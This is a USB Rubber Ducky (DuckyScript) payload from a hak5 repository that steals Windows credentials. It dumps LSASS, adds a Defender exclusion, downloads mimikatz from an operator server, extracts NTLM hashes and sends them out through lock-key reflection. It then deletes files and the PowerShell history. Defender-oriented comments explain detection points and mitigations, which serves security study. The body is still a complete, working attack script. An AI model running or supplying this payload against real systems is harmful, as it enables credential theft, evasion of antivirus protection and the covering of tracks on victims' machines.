hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/payload.txt
REM Title: DuckyScript payload for data exfiltration using keystroke reflection
REM Author: jakobfriedl
REM
REM Reviewer notes (read from the defender's side):
REM   The device enumerates as a USB keyboard and types everything below into the
REM   host. It presumes an unlocked interactive desktop, a UAC prompt that can be
REM   accepted with ALT y (a consent-only prompt, i.e. an already-administrative
REM   user), and an operator web server at #SERVER_URL reachable from the target.
REM   Host-side artifacts it leaves: taskmgr.exe and powershell.exe started
REM   elevated from the Run dialog moments after a new HID keyboard enumerates,
REM   a Defender exclusion on %TEMP%, lsass.DMP and mimikatz.exe in %TEMP%, a
REM   plain-HTTP download of mimikatz.exe, and deletion of the PSReadLine history
REM   file. Each of these is a detection point; LSA protection (RunAsPPL) or
REM   Credential Guard, UAC set to prompt for credentials, and USB device control
REM   are the preventive controls.
ATTACKMODE HID

REM OS Detection to ensure the target is Windows
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM CONFIGURATION:
REM Poll at most #MAX_WAIT times, #CHECK_INTERVAL ms apart (150 x 20 ms = 3 s),
REM for the host's lock-LED reply. A host that sent more than
REM #WINDOWS_HOST_REQUEST_COUNT configuration requests is classified as Windows.
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7

REM Default to "not Windows" until the heuristic below says otherwise.
$_OS = #NOT_WINDOWS

VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
END_EXTENSION

REM Abort with a red LED on any non-Windows host; nothing is typed in that case.
IF ($_OS != WINDOWS)
LED_R
STOP_PAYLOAD
END_IF

REM Define the URL of the server hosting the mimikatz executable
REM Operator-controlled placeholder. The target must reach it over plain HTTP,
REM so the download is visible to egress/proxy monitoring.
DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX

DELAY 1000
LED_OFF
REM Remember the host's NUMLOCK/CAPSLOCK/SCROLLLOCK state so it can be restored
REM (RESTORE_HOST_KEYBOARD_LOCK_STATE below) after the lock keys have been used
REM as a data channel.
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Exfil mode: presumably the Ducky now records lock-LED changes reported by
REM the host instead of treating them as ordinary keyboard state - confirm
REM against the firmware docs.
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
REM Delete existing dump file
REM Run dialog -> non-elevated PowerShell one-liner removing a stale dump.
GUI r
DELAY 200
STRINGLN powershell "rm $env:TEMP\lsass.DMP"
DELAY 200

REM Create lsass-dump using the TaskManager
REM Task Manager is started elevated (CTRL-SHIFT ENTER) and the UAC prompt is
REM answered with ALT y, which only works for a consent-style prompt. The
REM keystrokes then search for "lsass" and pick an entry from the process
REM context menu (SHIFT F10, five UPARROWs, ENTER); which entry that lands on
REM depends on the Task Manager version and layout. The second ENTER and ALT F4
REM presumably dismiss the resulting dialog and close Task Manager.
REM Defensively: lsass.DMP appearing in %TEMP% and taskmgr.exe opening a handle
REM to lsass.exe are the events to alert on; LSA protection (RunAsPPL) blocks
REM the dump from unprotected processes such as Task Manager, and Credential
REM Guard keeps the secrets out of LSASS memory in the first place.
GUI r
DELAY 200
STRING taskmgr
CTRL-SHIFT ENTER
DELAY 500
ALT y
DELAY 500
DOWNARROW
DELAY 1000
STRING lsass
DELAY 500
SHIFT F10
$I = 0
WHILE ($I < 5)
UPARROW
$I = ($I + 1)
END_WHILE
ENTER
DELAY 500
ENTER
ALT F4

REM Add exclusion path to the Windows Defender settings
REM Elevated PowerShell this time. The exclusion on %TEMP% is only added when
REM real-time protection is on, and it is removed again in the clean-up section.
REM Defender records exclusion changes in its operational event log, so this is
REM another alerting point; tamper protection may block the change outright.
GUI r
DELAY 200
STRING powershell.exe
CTRL-SHIFT ENTER
DELAY 500
ALT y
DELAY 500
STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}

REM Download mimikatz.exe from webserver
REM Plain-HTTP fetch into %TEMP% from the same elevated shell.
STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe
DELAY 1000

REM Execute mimikatz and the necessary commands
REM Enables the debug privilege, opens a log file, loads the minidump taken
REM above and lists logon credentials. The 5 s delay is a fixed wait for that
REM to finish; CTRL c is apparently used to leave the interactive mimikatz
REM console and return to the PowerShell prompt.
STRINGLN cd $env:TEMP
STRINGLN .\mimikatz.exe "privilege::debug"
STRINGLN log exfiltration.log
STRINGLN sekurlsa::minidump lsass.DMP
STRINGLN sekurlsa::logonpasswords
DELAY 5000
CTRL c
DELAY 500

REM Format mimikatz-log for exfiltration
REM Keeps every "NTLM" line plus the two lines before it (-Context 2,0), passes
REM the result through Get-Unique, and writes it to credentials.txt.
STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0 | Get-Unique > credentials.txt

REM Exfiltration
REM Convert the data in credentials.txt to NUMLOCK and CAPSLOCK values and terminate with SCROLLLOCK
REM Each byte becomes eight SendKeys tokens, MSB first (0x80 .. 0x01): NUMLOCK
REM for a 1 bit, CAPSLOCK for a 0 bit; a single SCROLLLOCK marks the end. The
REM channel therefore costs eight lock-key presses per byte, and any physical
REM keyboard's lock LEDs will presumably toggle visibly for the whole transfer.
STRINGLN foreach($byte in $(cat $env:TEMP\credentials.txt -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01) {if($byte -band $a){$o+='%{NUMLOCK}'} else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}'
DELAY 200

REM Reflect the keystrokes back to the USB Rubber Ducky
REM SendKeys.SendWait presses the lock keys on the host; the host then reports
REM the resulting lock state to all attached keyboards, the Ducky included,
REM which is how the bits reach the device.
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o)
DELAY 200

REM SCROLLLOCK indicates that exfiltration has completed
REM Blocks until the terminator arrives, then signals success with a green LED
REM and hands the lock keys back to the host's original state.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE

REM Clean-up
REM Remove files
REM Typed into the elevated PowerShell window, presumably still focused. These
REM remove the on-disk artifacts but not the process-creation, Defender
REM configuration and network traces generated above.
STRINGLN rm $env:TEMP\lsass.DMP
STRINGLN rm $env:TEMP\mimikatz.exe
STRINGLN rm $env:TEMP\exfiltration.log
STRINGLN rm $env:TEMP\credentials.txt
REM Reset configurations
STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP
REM Delete Powershell history
REM Removes the PSReadLine history file only; PowerShell script-block and module
REM logging, where enabled, still record every command typed in this session.
STRINGLN rm (Get-PSReadLineOption).HistorySavePath